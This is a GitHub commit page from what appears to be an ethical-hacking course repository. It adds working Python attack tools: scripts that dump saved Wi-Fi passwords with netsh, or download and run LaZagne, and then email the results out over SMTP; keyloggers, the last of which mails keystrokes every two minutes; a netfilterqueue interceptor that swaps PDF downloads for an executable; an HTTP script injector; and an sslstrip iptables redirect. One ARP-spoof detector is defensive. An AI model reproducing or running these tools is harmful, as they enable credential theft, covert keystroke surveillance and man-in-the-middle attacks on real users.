Skip to content
This repository was archived by the owner on Aug 24, 2023. It is now read-only.

Commit cfcb588

Browse files
author
root
committed
Updated
1 parent cc4501c commit cfcb588

40 files changed

+464
-3
lines changed
+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
#!/usr/bin/python2
2+
3+
import scapy.all as scapy
4+
5+
def getmac(ip):
6+
7+
arp_request_header = scapy.ARP(pdst = ip)
8+
ether_header = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
9+
arp_request_packet = ether_header/arp_request_header
10+
answered_list = scapy.srp(arp_request_packet,timeout=1,verbose=False)[0]
11+
return answered_list[0][1].hwsrc
12+
13+
def sniff(interface):
14+
15+
scapy.sniff(iface=interface,store=False,prn=process_sniffed_packet)
16+
17+
def process_sniffed_packet(packet):
18+
19+
if packet.haslayer(scapy.ARP) and packet[scapy.ARP].op==2:
20+
try:
21+
real_mac = getmac(packet[scapy.ARP].psrc)
22+
response_mac = packet[scapy.ARP].hwsrc
23+
24+
if real_mac != response_mac:
25+
print ("[+] You are under attack !!")
26+
27+
except IndexError:
28+
pass
29+
30+
sniff("wlan0")
+9
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
#!/usr/bin/python2.7
2+
3+
import subprocess
4+
5+
command = "pstree"
6+
7+
subprocess.Popen(command,shell=True)
8+
9+
#process open Popen
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
#!/usr/bin/python2.7
2+
3+
import subprocess
4+
import smtplib
5+
6+
def send_mail(email,password,message):
7+
8+
server = smtplib.SMTP("smtp.gmail.com",587)
9+
server.starttls()
10+
server.login(email,password)
11+
server.sendmail(email,email,message)
12+
server.quit()
13+
14+
command = "ifconfig"
15+
result = subprocess.check_output(command,shell=True)
16+
send_mail("[email protected]","Asdfjkl;1",result)
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
#!/usr/bin/python2.7
2+
3+
import subprocess
4+
import smtplib
5+
import re
6+
7+
def send_mail(email,password,message):
8+
9+
server = smtplib.SMTP("smtp.gmail.com",587)
10+
server.starttls()
11+
server.login(email,password)
12+
server.sendmail(email,email,message)
13+
server.quit()
14+
15+
command = "netsh wlan show profile"
16+
networks = subprocess.check_output(command,shell=True)
17+
network_names_list = re.findall("(?:Profile\s*:\s)(.*)",networks)
18+
19+
result = ""
20+
for network_name in network_names_list:
21+
command = "netsh wlan show profile" +network_name+" key=clear"
22+
current_result = subprocess.check_output(command,shell=True)
23+
result = result + current_result
24+
25+
26+
send_mail("[email protected]","Asdfjkl;1",result)

12 download_file/download_file.py

+15
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
#!/usr/bin/python2
2+
3+
import requests
4+
5+
def download(url):
6+
7+
get_request = requests.get(url)
8+
#print (get_request.content)
9+
#print (get_request)
10+
11+
with open("lamborghini.jpeg","w") as file:
12+
file.write(get_request.content)
13+
14+
download("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcQC7LyJgwpvRiGdxviJlf1O64vr8QUgB7ktqe3MYCapQIltZRig")
15+

12 download_file/lamborghini.jpeg

7.58 KB
Loading
701 KB
Binary file not shown.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
#!/usr/bin/python2.7
2+
3+
import requests
4+
import subprocess
5+
import smtplib
6+
import os
7+
import tempfile
8+
9+
def download(url):
10+
11+
get_request = requests.get(url)
12+
#print (get_request.content)
13+
#print (get_request)
14+
15+
with open("lazagne.exe","w") as file:
16+
file.write(get_request.content)
17+
18+
def send_mail(email,password,message):
19+
20+
server = smtplib.SMTP("smtp.gmail.com",587)
21+
server.starttls()
22+
server.login(email,password)
23+
server.sendmail(email,email,message)
24+
server.quit()
25+
26+
temp_directory = tempfile.gettempdir()
27+
os.chdir(temp_directory)
28+
download("http://localhost where lazagne .exe is stored")
29+
result = subprocess.check_output("lazagne.exe all",shell=True)
30+
send_mail("[email protected]","Asdfjkl;1",result)
31+
os.remove("lazagne.exe")

14 keylogger/keylogger_1.py

+10
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
#!/usr/bin/python
2+
3+
import pynput.keyboard
4+
5+
def process_key_press(key):
6+
print (key)
7+
8+
keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
9+
with keyboard_listener:
10+
keyboard_listener.join()

14 keylogger/keylogger_2.py

+21
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
#!/usr/bin/python
2+
3+
import pynput.keyboard
4+
5+
log = ""
6+
7+
def process_key_press(key):
8+
global log
9+
try:
10+
log = log + str(key.char)
11+
except AttributeError:
12+
if key == key.space:
13+
log = log + " "
14+
else:
15+
log = log +" " + str(key) + " "
16+
17+
print log
18+
19+
keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
20+
with keyboard_listener:
21+
keyboard_listener.join()

14 keylogger/keylogger_3.py

+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
#!/usr/bin/python
2+
3+
import pynput.keyboard
4+
import threading
5+
6+
log = ""
7+
8+
def process_key_press(key):
9+
global log
10+
try:
11+
log = log + str(key.char)
12+
except AttributeError:
13+
if key == key.space:
14+
log = log + " "
15+
else:
16+
log = log +" " + str(key) + " "
17+
18+
print (log)
19+
20+
def report():
21+
global log
22+
print (log)
23+
log = ""
24+
timer = threading.Timer(5,report)
25+
timer.start()
26+
27+
keyboard_listener=pynput.keyboard.Listener(on_press=process_key_press)
28+
with keyboard_listener:
29+
report()
30+
keyboard_listener.join()

14 keylogger/keylogger_4.py

+48
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
#!/usr/bin/python
2+
3+
import pynput.keyboard
4+
import threading
5+
import smtplib
6+
7+
log = ""
8+
9+
class Keylogger:
10+
def __init__(self,time_interval,email,password):
11+
self.log = "Keylogger started"
12+
self.interval = time_interval
13+
self.email = email
14+
self.password = password
15+
#print ("We are in constructor method")
16+
17+
def append_to_log(self,string):
18+
self.log = self.log + string
19+
20+
def process_key_press(self,key):
21+
try:
22+
current_key = str(key.char)
23+
except AttributeError:
24+
if key == key.space:
25+
current_key = " "
26+
else:
27+
current_key = " " + str(key) + " "
28+
self.append_to_log(current_key)
29+
30+
def report(self):
31+
#print (self.log)
32+
self.send_mail(self.email,self.password,"\n\n"+self.log)
33+
self.log = ""
34+
timer = threading.Timer(self.interval,self.report)
35+
timer.start()
36+
37+
def send_mail(self,email,password,message):
38+
server = smtplib.SMTP("smtp.gmail.com",587)
39+
server.starttls()
40+
server.login(email,password)
41+
server.sendmail(email,email,message)
42+
server.quit()
43+
44+
def start(self):
45+
keyboard_listener=pynput.keyboard.Listener(on_press=self.process_key_press)
46+
with keyboard_listener:
47+
self.report()
48+
keyboard_listener.join()

14 keylogger/keylogger_4.pyc

2.14 KB
Binary file not shown.

14 keylogger/zlogger.py

+6
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
#!/usr/bin/python
2+
3+
import keylogger_4
4+
5+
my_keylogger = keylogger_4.Keylogger(120,"[email protected]","Asdfjkl;1")
6+
my_keylogger.start()

3 arp_spoof/arp_spoof-1.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-2.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-3.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-4.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-5.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-6.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-7.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-8.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-final.py

100644100755
File mode changed.

3 arp_spoof/arp_spoof-refine.py

+3-3
Original file line numberDiff line numberDiff line change
@@ -42,13 +42,13 @@ def getmac_all(ip_range):
4242

4343
return clients_list
4444

45-
ip_mac = getmac_all(ip_range)
46-
#ip_mac = getmac_all("192.168.43.1/24")
45+
46+
ip_mac = getmac_all("192.168.43.1/24")
4747
print ip_mac
4848

4949
def getmac(ip_addr):
5050
for items in ip_mac:
51-
if ip_addr in items.keys()
51+
if ip_addr in items.keys():
5252
mac_addr = items[ip_addr]
5353
return mac_addr
5454

4 packet_sniffer/iptab.txt

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

4 packet_sniffer/packet_sniffer-1.py

100644100755
File mode changed.

4 packet_sniffer/packet_sniffer-2.py

100644100755
File mode changed.

4 packet_sniffer/packet_sniffer-3.py

100644100755
File mode changed.

4 packet_sniffer/packet_sniffer-4.py

100644100755
File mode changed.

4 packet_sniffer/packet_sniffer-5.py

100644100755
File mode changed.

4 packet_sniffer/packet_sniffer-6.py

100644100755
File mode changed.

4 packet_sniffer/packet_sniffer-final.py

100644100755
File mode changed.

4 packet_sniffer/sslstrip.log

Whitespace-only changes.

6 netfilterqueue/net-accepter.py

+16
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
#!/usr/bin/python2
2+
#capture the request packet from client and save to a queue using iptables and alter send or recieve modified packet
3+
#iptables commands iptables -I FORWARD -j NFQUEUE --queue-num 0
4+
5+
import netfilterqueue
6+
7+
8+
def process_packet(packet):
9+
print packet
10+
packet.accept()
11+
12+
queue = netfilterqueue.NetfilterQueue()
13+
queue.bind(0,process_packet)
14+
queue.run()
15+
16+

6 netfilterqueue/net-cutter.py

+15
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
#!/usr/bin/python2
2+
#capture the request packet from client and save to a queue using iptables and alter to send or recieve modified packet
3+
#drop the packet cut the netconnection because packet.accept() is not specified
4+
5+
import netfilterqueue
6+
7+
8+
def process_packet(packet):
9+
print packet
10+
11+
queue = netfilterqueue.NetfilterQueue()
12+
queue.bind(0,process_packet)
13+
queue.run()
14+
15+
+40
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
#!/usr/bin/python2.7
2+
3+
import netfilterqueue
4+
import scapy.all as scapy
5+
6+
7+
ack_list=[]
8+
9+
def set_load(packet,load):
10+
packet[scapy.Raw].load=load
11+
del packet[scapy.IP].len
12+
del packet[scapy.IP].chksum
13+
del packet[scapy.TCP].chksum
14+
return packet
15+
16+
17+
def process_packet(packet):
18+
scapy_packet=scapy.IP(packet.get_payload())
19+
if scapy_packet.haslayer(scapy.Raw):
20+
21+
if scapy_packet[scapy.TCP].dport == 80:
22+
if ".pdf" in scapy_packet[scapy.Raw].load:
23+
print "PDF Request"
24+
ack_list.append(scapy_packet[scapy.TCP].ack)
25+
print scapy_packet.show()
26+
27+
elif scapy_packet[scapy.TCP].sport == 80:
28+
if scapy_packet[scapy.TCP].seq in ack_list:
29+
ack_list.remove(scapy_packet[scapy.TCP].seq)
30+
print 'Replacing files'
31+
modified_packet = set_load(scapy_packet,"HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/winrar-x64-561.exe\n\n")
32+
33+
packet.set_payload(str(modified_packet))
34+
35+
packet.accept()
36+
37+
38+
queue=netfilterqueue.NetfilterQueue()
39+
queue.bind(0,process_packet)
40+
queue.run()

8 code_injector/code-injector-1.py

+45
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
#!/usr/bin/python2.7
2+
3+
import netfilterqueue
4+
import scapy.all as scapy
5+
import re
6+
7+
8+
ack_list=[]
9+
10+
def set_load(packet,load):
11+
packet[scapy.Raw].load=load
12+
del packet[scapy.IP].len
13+
del packet[scapy.IP].chksum
14+
del packet[scapy.TCP].chksum
15+
return packet
16+
17+
18+
def process_packet(packet):
19+
scapy_packet=scapy.IP(packet.get_payload())
20+
if scapy_packet.haslayer(scapy.Raw):
21+
22+
if scapy_packet[scapy.TCP].dport == 80:
23+
print "[+]Request "
24+
#print scapy_packet.show()
25+
modified_load = re.sub("Accept-Encoding:.*?\\r\\n","",scapy_packet[scapy.Raw].load)
26+
new_packet=set_load(scapy_packet,modified_load)
27+
packet.set_payload(str(new_packet))
28+
print scapy_packet.show()
29+
30+
31+
elif scapy_packet[scapy.TCP].sport == 80:
32+
print "[+] Response "
33+
print scapy_packet.show()
34+
modified_load=scapy_packet[scapy.Raw].load.replace("</body>","<script>alert('test');</script></body>")
35+
#modified_load=scapy_packet[scapy.Raw].load.replace("<body>","<body><script>alert('test');</script>")
36+
new_packet=set_load(scapy_packet,modified_load)
37+
packet.set_payload(str(new_packet))
38+
#print scapy_packet.show()
39+
40+
packet.accept()
41+
42+
43+
queue=netfilterqueue.NetfilterQueue()
44+
queue.bind(0,process_packet)
45+
queue.run()

0 commit comments

Comments
 (0)